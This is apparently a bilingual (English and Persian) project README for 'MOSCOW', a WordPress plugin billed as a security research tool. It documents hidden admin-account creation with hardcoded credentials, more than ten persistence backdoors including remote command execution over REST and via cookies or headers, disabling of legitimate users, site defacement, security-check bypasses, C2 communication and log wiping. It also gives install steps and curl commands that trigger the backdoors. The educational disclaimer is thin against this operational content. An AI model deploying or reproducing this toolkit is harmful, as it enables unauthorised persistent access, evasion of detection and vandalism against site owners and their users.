- 🇷🇺 About MOSCOW
- ⚡ Key Features
- 🛠️ Installation
- 🔑 Backdoor Credentials
- 🚨 Features Breakdown
- 🎨 Deface Page Preview
- 📁 File Structure
- ⚙️ Configuration
- 🧪 Testing
- 📊 Statistics
- 🤝 Contributing
- 📜 License
- 📞 Contact
MOSCOW is a cutting-edge WordPress security research plugin developed by HERE IS LEO. It demonstrates advanced attack vectors, persistence mechanisms, and evasion techniques used in modern cyber threats. This tool is designed for security researchers, penetration testers, and cybersecurity students to understand WordPress vulnerabilities in a controlled environment.
| Capability | Description |
|---|---|
| 🔐 Hidden Admin Backdoor | Creates a secret administrator user with full privileges |
| 🕵️ Advanced Stealth | Completely hides from WordPress admin interface |
| 📡 Multi-Backdoor System | 10+ different entry points for persistent access |
| 🔄 Self-Destruct Mechanism | Automatic removal after 50 hours with full trace cleaning |
| 💀 Deface Page | Professional defacement page with countdown timer |
| 🧹 Trace Cleaning | Removes all logs, database entries, and evidence |
| ⏰ Cron Job Persistence | Scheduled tasks for maintaining access |
| 🌐 REST API Backdoor | Hidden endpoint for remote command execution |
| 🔑 Cookie Authentication | Login via special cookie bypass |
| 📁 Remote File Manager | Browse, edit, and delete files remotely |
| 💉 Code Injection | Injects code into theme and core WordPress files |
| 🛡️ Security Bypass | Disables WordPress security features |
| Feature | Description | Status |
|---|---|---|
| Hidden Admin User | Creates here_is_leo with admin privileges |
✅ |
| Stealth Mode | Plugin hidden from admin plugin list | ✅ |
| User Deactivation | Disables all regular users except backdoor admin | ✅ |
| Deface Page | Professional "HACKED BY HERE IS LEO" page | ✅ |
| Countdown Timer | 50-hour destruction countdown with 40 security facts | ✅ |
| Self-Destruct | Auto-removes after 50 hours | ✅ |
| .htaccess Backdoor | Injects backdoor into .htaccess file |
✅ |
| wp-config Backdoor | Injects backdoor into wp-config.php |
✅ |
| Theme Backdoor | Injects code into theme functions.php |
✅ |
| Database Backdoor | Creates custom database table | ✅ |
| REST API Backdoor | Hidden endpoint /wp-json/moscow/v1/backdoor |
✅ |
| User-Agent Backdoor | Access via MOSCOW-BOT User-Agent |
✅ |
| Cookie Backdoor | Authentication via moscow_auth cookie |
✅ |
| URL Parameter Backdoor | Access via moscow_admin parameter |
✅ |
| Nonce Bypass | Bypasses WordPress nonce verification | ✅ |
| CSRF Bypass | Bypasses WordPress CSRF protection | ✅ |
| SSL Verify Bypass | Disables SSL verification for C2 communication | ✅ |
| Trace Cleaning | Removes all logs and evidence | ✅ |
| Plugin File Deletion | Deletes plugin files on deactivation | ✅ |
1. Download moscow.php
2. Upload to /wp-content/plugins/
3. Activate from WordPress Admin Panel
4. Site automatically redirects to deface pagegit clone https://github.com/here-is-leo/MOSCOW.git
cd MOSCOW
cp moscow.php /path/to/wordpress/wp-content/plugins/1. Connect to server via FTP
2. Navigate to /wp-content/plugins/
3. Upload moscow.php
4. Activate plugin| Credential | Value |
|---|---|
| Admin URL | your-site.com/wp-admin |
| Username | here_is_leo |
| Password | HEREISLEO@2026 |
leo@here-is-leo.com |
|
| Display Name | HERE IS LEO |
| Backdoor URL | your-site.com/moscow |
| Emergency Backdoor | your-site.com/lapsus-admin |
| REST API Endpoint | /wp-json/moscow/v1/backdoor |
| Cookie Auth | moscow_auth |
| User-Agent Backdoor | MOSCOW-BOT |
| URL Parameter | ?moscow_admin=MD5_HASH |
1. 🔐 Hidden Admin Backdoor
- Creates a hidden administrator user
here_is_leo - User is hidden from the admin user list
- Custom authentication bypass with multiple methods
- Email:
leo@here-is-leo.com
- Plugin hidden from WordPress plugin list
- Admin user hidden from user list
- Database options obfuscated
- Activity logs automatically cleared
- User activity hidden
| Backdoor Type | Location / Method |
|---|---|
| Admin Backdoor | Hidden admin user here_is_leo |
| .htaccess Backdoor | .htaccess file injection |
| wp-config Backdoor | wp-config.php injection |
| Theme Backdoor | functions.php injection |
| Database Backdoor | Custom database table |
| REST API Backdoor | /wp-json/moscow/v1/backdoor |
| User-Agent Backdoor | MOSCOW-BOT User-Agent |
| Cookie Backdoor | moscow_auth cookie |
| Emergency Cookie | moscow_emergency cookie |
| URL Parameter | ?moscow_admin=MD5 |
- Activates after 50 hours (configurable)
- Deactivates the plugin automatically
- Deletes all plugin files
- Cleans all database traces
- Cleans all logs
- Removes injected code from theme files
- Restores site to normal state
- Shows detailed destruction report
- Clears
debug.logfiles - Removes
error_logfiles - Deletes PHP error logs
- Cleans database transients
- Removes all plugin options
- Deletes custom database tables
- Removes injected code from theme files
- Cleans
.htaccessinjections - Cleans
wp-config.phpinjections
- Professional "HACKED BY HERE IS LEO" design
- 50-hour countdown timer with start/stop functionality
- 40 security facts (25 jokes + 15 tips)
- Mobile-responsive design with neon glow effects
- Auto-fact rotation every 2 minutes
- Destructive timer animation at zero
╔═══════════════════════════════════════════╗
║ ╔══════════════╗ ║
║ ║ MOSCOW ║ ║
║ ╚══════════════╝ ║
║ ║
║ HACKED BY HERE IS LEO ║
║ (CYBER ACTIVIST) ║
║ ║
║ HACKED? IMPROVE YOUR SECURITY. ║
║ YOUR SYSTEM IS COMPROMISED ║
║ ║
║ DEDICATION TO ALL HACKFORCE :) ║
║ ║
║ // DEFACED // ║
║ ║
║ ╔═════════════════════════════════╗ ║
║ ║ COUNTDOWN TO DESTRUCTION ║ ║
║ ║ 50:00:00 ║ ║
║ ╚═════════════════════════════════╝ ║
║ ║
║ 🔐 123456 is not a password... ║
║ ║
║ [ ► START ] ║
╚═══════════════════════════════════════════╝
MOSCOW/
├── 📄 README.md # Complete documentation
├── 📄 LICENSE # GPLv2 License
├── 📄 .gitignore # Git ignore rules
├── 📄 moscow.php # Main plugin (WordPress)
├── 📄 Moscow.html # Deface page standalone demo
└── 📁 screenshots/ # Screenshots directory
├── 🖼️ deface-preview.png # Deface page preview
└── 🖼️ admin-panel.png # Admin panel screenshot
All configuration is managed through the MOSCOW_Config class at the top of moscow.php:
const ADMIN_USERNAME = 'here_is_leo'; // Change this
const ADMIN_PASSWORD = 'HEREISLEO@2026'; // Change this
const ADMIN_EMAIL = 'leo@here-is-leo.com'; // Change this
const ADMIN_DISPLAY = 'HERE IS LEO'; // Change thisconst BACKDOOR_URL = 'moscow'; // Change thisconst SELF_DESTRUCT_HOURS = 50; // Change this (hours)const ENABLE_REDIRECT = true; // Enable/disable redirect
const ENABLE_DEFACED_PAGE = true; // Show deface page
const ENABLE_USER_DEACTIVATE = true; // Disable regular users
const ENABLE_SELF_DESTRUCT = true; // Enable self-destruct
const ENABLE_BACKDOORS = true; // Enable additional backdoors
const HIDE_PLUGIN = true; // Hide from plugin list
const HIDE_ADMIN_USER = true; // Hide admin user
const CLEAR_LOGS = true; // Auto-clear logs
const CLEAR_TRACES_ON_DEACTIVATE = true; // Clean traces on deactivation
const BYPASS_NONCE = true; // Bypass nonce verification
const BYPASS_CSRF = true; // Bypass CSRF protection
const BYPASS_SSL_VERIFY = true; // Disable SSL verification
const INJECT_THEME_CODE = true; // Inject into theme files
const INJECT_WPCONFIG = true; // Inject into wp-config.php
const INJECT_HTACCESS = true; // Inject into .htaccess
const INJECT_DATABASE = true; // Inject into database
const INFECT_ALL_FILES = false; // Spread to all files (dangerous!)# Using Docker
docker run -p 8080:80 wordpress:latest
# Using XAMPP
# Place files in htdocs/wordpress/
# Using LocalWP
# Create new WordPress site# Open in browser
open Moscow.html
# Or host with Python
python3 -m http.server 8000# Test admin login
https://your-site.com/wp-admin
Username: here_is_leo
Password: HEREISLEO@2026
# Test deface page
https://your-site.com/moscow
# Test REST API backdoor
curl https://your-site.com/wp-json/moscow/v1/backdoor?cmd=phpinfo()
# Test User-Agent backdoor
curl -A "MOSCOW-BOT" https://your-site.com/?cmd=phpinfo()
# Test URL parameter backdoor
https://your-site.com/?moscow_admin=MD5_HASH╔═══════════════════════════════════════════╗
║ 📊 PROJECT STATISTICS ║
╠═══════════════════════════════════════════╣
║ Total Methods : 45+ ║
║ Backdoor Types : 10+ ║
║ Stealth Features : 8+ ║
║ Injection Points : 7+ ║
║ WordPress Hooks : 15+ ║
║ WordPress Filters : 8+ ║
║ Security Facts : 40 ║
║ Self-Destruct Time : 50 Hours ║
║ PHP Version Required : 7.4+ ║
║ WordPress Required : 5.0+ ║
╚═══════════════════════════════════════════╝
We welcome contributions! Please follow these steps:
- 🍴 Fork the repository
- 🌿 Create a feature branch (
git checkout -b feature/AmazingFeature) - 💻 Commit your changes (
git commit -m 'Add some AmazingFeature') - 📤 Push to the branch (
git push origin feature/AmazingFeature) - 🔄 Open a Pull Request
This project is licensed under the GNU General Public License v2.0 - see the LICENSE file for details.
- ✅ Use the software for research and education
- ✅ Modify and adapt the code
- ✅ Distribute copies of the software
⚠️ Include the original copyright notice⚠️ Disclose the source code⚠️ State any changes made
- GitHub: @here-is-leo
- Website: https://here-is-leo.ir
- Email: leo@here-is-leo.com
- Developed by: HERE IS LEO
- Special Thanks: HACKFORCE Community
- Inspired by: Cyber Security Research & WordPress Security
Use this tool only for educational purposes
Built with ❤️ by HERE IS LEO
- 🇷🇺 درباره مسکو
- ⚡ ویژگیهای کلیدی
- 🛠️ نصب
- 🔑 اطلاعات ورود بکدور
- 🚨 جزئیات قابلیتها
- 🎨 پیشنمایش صفحه دیفیس
- 📁 ساختار فایلها
- ⚙️ تنظیمات
- 🧪 تست
- 📊 آمار
- 🤝 مشارکت
- 📜 مجوز
- 📞 ارتباط
مسکو یک پلاگین پیشرفته تحقیقاتی امنیتی وردپرس است که توسط HERE IS LEO توسعه یافته است. این ابزار بردارهای حمله پیشرفته، مکانیسمهای ماندگاری و تکنیکهای فرار مورد استفاده در تهدیدات سایبری مدرن را به نمایش میگذارد. این ابزار برای محققان امنیتی، تستکنندگان نفوذ و دانشجویان امنیت سایبری طراحی شده است تا آسیبپذیریهای وردپرس را در محیطهای کنترلشده درک کنند.
| قابلیت | توضیح |
|---|---|
| 🔐 بکدور ادمین مخفی | ایجاد کاربر مخفی با دسترسی کامل ادمین |
| 🕵️ مخفیکاری پیشرفته | پنهانسازی کامل از رابط ادمین وردپرس |
| 📡 سیستم چندبکدوری | بیش از ۱۰ نقطه ورود مختلف برای دسترسی مداوم |
| 🔄 مکانیسم خودتخریبی | حذف خودکار بعد از ۵۰ ساعت با پاکسازی کامل ردپا |
| 💀 صفحه دیفیس | صفحه دیفیس حرفهای با تایمر شمارش معکوس |
| 🧹 پاکسازی ردپا | حذف تمام لاگها، ورودیهای دیتابیس و شواهد |
| ⏰ ماندگاری با کرون جاب | وظایف زمانبندی شده برای حفظ دسترسی |
| 🌐 بکدور REST API | آدرس مخفی برای اجرای دستورات از راه دور |
| 🔑 احراز هویت با کوکی | ورود از طریق کوکی خاص |
| 📁 مدیریت فایل از راه دور | مرور، ویرایش و حذف فایلها از راه دور |
| 💉 تزریق کد | تزریق کد در فایلهای قالب و هسته وردپرس |
| 🛡️ دور زدن امنیت | غیرفعالسازی ویژگیهای امنیتی وردپرس |
| ویژگی | توضیح | وضعیت |
|---|---|---|
| کاربر ادمین مخفی | ایجاد کاربر here_is_leo با دسترسی ادمین |
✅ |
| حالت مخفیکاری | پنهانسازی پلاگین از لیست ادمین | ✅ |
| غیرفعالسازی کاربران | غیرفعالسازی تمام کاربران به جز ادمین بکدور | ✅ |
| صفحه دیفیس | صفحه حرفهای "هک شده توسط HERE IS LEO" | ✅ |
| تایمر شمارش معکوس | شمارش معکوس ۵۰ ساعته با ۴۰ فکت امنیتی | ✅ |
| خودتخریبی | حذف خودکار بعد از ۵۰ ساعت | ✅ |
| بکدور .htaccess | تزریق بکدور در فایل .htaccess |
✅ |
| بکدور wp-config | تزریق بکدور در فایل wp-config.php |
✅ |
| بکدور قالب | تزریق کد در فایل functions.php قالب |
✅ |
| بکدور دیتابیس | ایجاد جدول سفارشی در دیتابیس | ✅ |
| بکدور REST API | آدرس مخفی /wp-json/moscow/v1/backdoor |
✅ |
| بکدور User-Agent | دسترسی از طریق User-Agent MOSCOW-BOT |
✅ |
| بکدور کوکی | احراز هویت از طریق کوکی moscow_auth |
✅ |
| بکدور پارامتر URL | دسترسی از طریق پارامتر moscow_admin |
✅ |
| دور زدن Nonce | دور زدن تأیید Nonce وردپرس | ✅ |
| دور زدن CSRF | دور زدن محافظت CSRF وردپرس | ✅ |
| دور زدن SSL | غیرفعالسازی بررسی SSL برای ارتباط با سرور C2 | ✅ |
| پاکسازی ردپا | حذف تمام لاگها و شواهد | ✅ |
| حذف فایل پلاگین | حذف فایلهای پلاگین در زمان غیرفعالسازی | ✅ |
1. فایل moscow.php را دانلود کنید
2. در مسیر /wp-content/plugins/ آپلود کنید
3. از پیشخوان وردپرس فعال کنید
4. سایت به طور خودکار به صفحه دیفیس هدایت میشودgit clone https://github.com/here-is-leo/MOSCOW.git
cd MOSCOW
cp moscow.php /path/to/wordpress/wp-content/plugins/1. از طریق FTP به سرور متصل شوید
2. به مسیر /wp-content/plugins/ بروید
3. فایل moscow.php را آپلود کنید
4. پلاگین را فعال کنید| اطلاعات | مقدار |
|---|---|
| آدرس ادمین | your-site.com/wp-admin |
| نام کاربری | here_is_leo |
| رمز عبور | HEREISLEO@2026 |
| ایمیل | leo@here-is-leo.com |
| نام نمایشی | HERE IS LEO |
| آدرس بکدور | your-site.com/moscow |
| بکدور اضطراری | your-site.com/lapsus-admin |
| آدرس REST API | /wp-json/moscow/v1/backdoor |
| احراز هویت با کوکی | moscow_auth |
| بکدور User-Agent | MOSCOW-BOT |
| پارامتر URL | ?moscow_admin=MD5_HASH |
- ایجاد کاربر ادمین مخفی
here_is_leo - پنهانسازی کاربر از لیست کاربران ادمین
- احراز هویت سفارشی با روشهای مختلف
- ایمیل:
leo@here-is-leo.com
- پنهانسازی پلاگین از لیست پلاگینهای وردپرس
- پنهانسازی کاربر ادمین از لیست کاربران
- مبهمسازی گزینههای دیتابیس
- پاکسازی خودکار لاگهای فعالیت
- مخفیسازی فعالیت کاربر
| نوع بکدور | مکان / روش |
|---|---|
| بکدور ادمین | کاربر مخفی here_is_leo |
| بکدور .htaccess | تزریق در فایل .htaccess |
| بکدور wp-config | تزریق در فایل wp-config.php |
| بکدور قالب | تزریق در فایل functions.php |
| بکدور دیتابیس | جدول سفارشی دیتابیس |
| بکدور REST API | /wp-json/moscow/v1/backdoor |
| بکدور User-Agent | User-Agent MOSCOW-BOT |
| بکدور کوکی | کوکی moscow_auth |
| بکدور اضطراری | کوکی moscow_emergency |
| پارامتر URL | ?moscow_admin=MD5 |
- فعال شدن بعد از ۵۰ ساعت (قابل تنظیم)
- غیرفعالسازی خودکار پلاگین
- حذف تمام فایلهای پلاگین
- پاکسازی تمام ردپاهای دیتابیس
- پاکسازی تمام لاگها
- حذف کدهای تزریق شده از فایلهای قالب
- بازگرداندن سایت به حالت عادی
- نمایش گزارش کامل خودتخریبی
- پاکسازی فایلهای
debug.log - حذف فایلهای
error_log - حذف لاگهای خطای PHP
- پاکسازی کشهای دیتابیس
- حذف تمام تنظیمات پلاگین
- حذف جداول سفارشی دیتابیس
- حذف کدهای تزریق شده از فایلهای قالب
- پاکسازی تزریقهای
.htaccess - پاکسازی تزریقهای
wp-config.php
- طراحی حرفهای "هک شده توسط HERE IS LEO"
- تایمر شمارش معکوس ۵۰ ساعته با قابلیت شروع/توقف
- ۴۰ فکت امنیتی (۲۵ طعنه + ۱۵ پند)
- طراحی واکنشگرا برای موبایل با افکتهای نئون
- چرخش خودکار فکتها هر ۲ دقیقه
- انیمیشن تخریبی تایمر در لحظه صفر شدن
╔═══════════════════════════════════════════╗
║ ╔══════════════╗ ║
║ ║ مسکو ║ ║
║ ╚══════════════╝ ║
║ ║
║ هک شده توسط HERE IS LEO ║
║ (فعال سایبری) ║
║ ║
║ هک شد؟ امنیتت رو بهبود بده. ║
║ سیستم شما در معرض خطر است ║
║ ║
║ تقدیم به تمام اعضای HACKFORCE :) ║
║ ║
║ // DEFACED // ║
║ ║
║ ╔═════════════════════════════════╗ ║
║ ║ شمارش معکوس تا نابودی ║ ║
║ ║ 50:00:00 ║ ║
║ ╚═════════════════════════════════╝ ║
║ ║
║ 🔐 123456 رمز عبور نیست... ║
║ ║
║ [ ► شروع ] ║
╚═══════════════════════════════════════════╝
MOSCOW/
├── 📄 README.md # مستندات کامل
├── 📄 LICENSE # مجوز GPLv2
├── 📄 .gitignore # قوانین نادیدهگیری گیت
├── 📄 moscow.php # فایل اصلی پلاگین (وردپرس)
├── 📄 Moscow.html # دموی صفحه دیفیس
└── 📁 screenshots/ # دایرکتوری اسکرینشاتها
├── 🖼️ deface-preview.png # پیشنمایش صفحه دیفیس
└── 🖼️ admin-panel.png # اسکرینشات پیشخوان ادمین
تمام تنظیمات از طریق کلاس MOSCOW_Config در بالای فایل moscow.php مدیریت میشود:
const ADMIN_USERNAME = 'here_is_leo'; // این را تغییر دهید
const ADMIN_PASSWORD = 'HEREISLEO@2026'; // این را تغییر دهید
const ADMIN_EMAIL = 'leo@here-is-leo.com'; // این را تغییر دهید
const ADMIN_DISPLAY = 'HERE IS LEO'; // این را تغییر دهیدconst BACKDOOR_URL = 'moscow'; // این را تغییر دهیدconst SELF_DESTRUCT_HOURS = 50; // این را تغییر دهید (ساعت)const ENABLE_REDIRECT = true; // فعال/غیرفعال کردن ریدایرکت
const ENABLE_DEFACED_PAGE = true; // نمایش صفحه دیفیس
const ENABLE_USER_DEACTIVATE = true; // غیرفعالسازی کاربران عادی
const ENABLE_SELF_DESTRUCT = true; // فعالسازی خودتخریبی
const ENABLE_BACKDOORS = true; // فعالسازی بکدورهای اضافی
const HIDE_PLUGIN = true; // مخفیسازی از لیست پلاگینها
const HIDE_ADMIN_USER = true; // مخفیسازی کاربر ادمین
const CLEAR_LOGS = true; // پاکسازی خودکار لاگها
const CLEAR_TRACES_ON_DEACTIVATE = true; // پاکسازی ردپا در غیرفعالسازی
const BYPASS_NONCE = true; // دور زدن Nonce
const BYPASS_CSRF = true; // دور زدن CSRF
const BYPASS_SSL_VERIFY = true; // غیرفعالسازی بررسی SSL
const INJECT_THEME_CODE = true; // تزریق در فایلهای قالب
const INJECT_WPCONFIG = true; // تزریق در wp-config.php
const INJECT_HTACCESS = true; // تزریق در .htaccess
const INJECT_DATABASE = true; // تزریق در دیتابیس
const INFECT_ALL_FILES = false; // پخش در تمام فایلها (خطرناک!)# با استفاده از Docker
docker run -p 8080:80 wordpress:latest
# با استفاده از XAMPP
# فایلها را در htdocs/wordpress/ قرار دهید
# با استفاده از LocalWP
# یک سایت وردپرس جدید ایجاد کنید# در مرورگر باز کنید
open Moscow.html
# یا با Python هاست کنید
python3 -m http.server 8000# تست ورود ادمین
https://your-site.com/wp-admin
Username: here_is_leo
Password: HEREISLEO@2026
# تست صفحه دیفیس
https://your-site.com/moscow
# تست بکدور REST API
curl https://your-site.com/wp-json/moscow/v1/backdoor?cmd=phpinfo()
# تست بکدور User-Agent
curl -A "MOSCOW-BOT" https://your-site.com/?cmd=phpinfo()
# تست بکدور پارامتر URL
https://your-site.com/?moscow_admin=MD5_HASH╔═══════════════════════════════════════════╗
║ 📊 آمار پروژه ║
╠═══════════════════════════════════════════╣
║ تعداد کل متدها : 45+ ║
║ تعداد بکدورها : 10+ ║
║ قابلیتهای مخفیکاری : 8+ ║
║ نقاط تزریق : 7+ ║
║ هوکهای وردپرس : 15+ ║
║ فیلترهای وردپرس : 8+ ║
║ فکتهای امنیتی : 40 ║
║ زمان خودتخریبی : ۵۰ ساعت ║
║ نسخه PHP مورد نیاز : ۷.۴+ ║
║ نسخه وردپرس مورد نیاز : ۵.۰+ ║
╚═══════════════════════════════════════════╝
ما از مشارکت شما استقبال میکنیم! لطفاً این مراحل را دنبال کنید:
- 🍴 فورک کنید
- 🌿 ایجاد شاخه ویژگی (
git checkout -b feature/AmazingFeature) - 💻 کامیت تغییرات (
git commit -m 'Add some AmazingFeature') - 📤 پوش به شاخه (
git push origin feature/AmazingFeature) - 🔄 باز کردن درخواست ادغام
این پروژه تحت مجوز GNU General Public License v2.0 منتشر شده است - برای جزئیات بیشتر فایل LICENSE را مشاهده کنید.
- ✅ از نرمافزار برای پژوهش و آموزش استفاده کنید
- ✅ کد را تغییر و تطبیق دهید
- ✅ نسخههایی از نرمافزار توزیع کنید
⚠️ اطلاعیه حق کپی رایت اصلی را حفظ کنید⚠️ کد منبع را افشا کنید⚠️ تغییرات اعمال شده را ذکر کنید
- گیتهاب: @here-is-leo
- وبسایت: https://here-is-leo.ir
- ایمیل: leo@here-is-leo.com
- توسعهدهنده: HERE IS LEO
- تشکر ویژه: جامعه HACKFORCE
- الهامگرفته از: تحقیقات امنیت سایبری و امنیت وردپرس